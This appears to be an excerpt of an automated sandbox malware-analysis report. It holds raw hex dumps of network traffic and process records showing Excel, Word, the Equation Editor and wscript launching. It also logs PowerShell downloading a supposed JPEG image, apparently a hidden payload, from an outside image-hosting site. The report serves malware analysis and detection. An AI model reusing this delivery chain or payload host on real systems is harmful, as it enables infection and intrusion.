            2024-05-27 07:00:46 UTC1369INData Raw: d9 87 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b
            Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jk
            2024-05-27 07:00:46 UTC1369INData Raw: c4 1f 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa
            Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
            2024-05-27 07:00:46 UTC1369INData Raw: 03 32 f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08
            Data Ascii: 2HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^
            2024-05-27 07:00:46 UTC1369INData Raw: 1a 3c a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2
            Data Ascii: <RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>im
            2024-05-27 07:00:46 UTC1369INData Raw: 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca
            Data Ascii: T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},
            2024-05-27 07:00:46 UTC1369INData Raw: 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5
            Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSS
            2024-05-27 07:00:46 UTC1369INData Raw: 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4
            Data Ascii: 4/mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@B
            2024-05-27 07:00:46 UTC1369INData Raw: 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76
            Data Ascii: @t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            2192.168.2.2249174188.114.97.34433608C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            TimestampBytes transferredDirectionData
            2024-05-27 07:00:50 UTC100OUTGET /images/004/785/720/original/new_image.jpg?1716307634 HTTP/1.1
            Host: uploaddeimagens.com.br
            2024-05-27 07:00:50 UTC692INHTTP/1.1 200 OK
            Date: Mon, 27 May 2024 07:00:50 GMT
            Content-Type: image/jpeg
            Content-Length: 4201093
            Connection: close
            Last-Modified: Tue, 21 May 2024 16:07:14 GMT
            ETag: "664cc6b2-401a85"
            Cache-Control: max-age=2678400
            CF-Cache-Status: HIT
            Age: 4
            Accept-Ranges: bytes
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdfy37gpQzT%2ByWx7E48JQRgnIYUjavJ5IKXTpNDAe0hp0ZgsYdW93EA33SX%2FzcsDuxg8V9OA08LC36FTpPsmVk2u71ij1ziai3PcGbwZ1evDBXtKOZdtL%2FmTawJTbW6Z94D5enlbkchu"}],"group":"cf-nel","max_age":604800}
            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 88a421587d190f87-EWR
            alt-svc: h3=":443"; ma=86400
            2024-05-27 07:00:50 UTC677INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
            Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
            2024-05-27 07:00:50 UTC1369INData Raw: 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43 2e e2
            Data Ascii: TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC.
            2024-05-27 07:00:50 UTC1369INData Raw: 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab 03 31
            Data Ascii: Ay2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV1
            2024-05-27 07:00:50 UTC1369INData Raw: fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e 68 19
            Data Ascii: r7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(h
            2024-05-27 07:00:50 UTC1369INData Raw: c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d 8c a8
            Data Ascii: HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}
            2024-05-27 07:00:50 UTC1369INData Raw: cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76 91 64
            Data Ascii: vOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imvd
            2024-05-27 07:00:50 UTC1369INData Raw: fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90 dd f1
            Data Ascii: f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
            2024-05-27 07:00:50 UTC1369INData Raw: 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23 08 05
            Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
            2024-05-27 07:00:50 UTC1369INData Raw: 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48 35 d8
            Data Ascii: nq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH5
            2024-05-27 07:00:50 UTC1369INData Raw: 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16 c2 dd
            Data Ascii: K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


            Statistics

            CPU Usage

            Click to jump to process

            Memory Usage

            Click to jump to process

            High Level Behavior Distribution

            Click to dive into process behavior distribution

            Behavior

            Click to jump to process

            System Behavior

            General

            Target ID:0
            Start time:03:00:02
            Start date:27/05/2024
            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
            Imagebase:0x13fa50000
            File size:28'253'536 bytes
            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:4
            Start time:03:00:26
            Start date:27/05/2024
            Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
            Wow64 process (32bit):false
            Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
            Imagebase:0x13f500000
            File size:1'423'704 bytes
            MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:false

            General

            Target ID:7
            Start time:03:00:37
            Start date:27/05/2024
            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
            Wow64 process (32bit):true
            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
            Imagebase:0x400000
            File size:543'304 bytes
            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            General

            Target ID:9
            Start time:03:00:39
            Start date:27/05/2024
            Path:C:\Windows\SysWOW64\wscript.exe
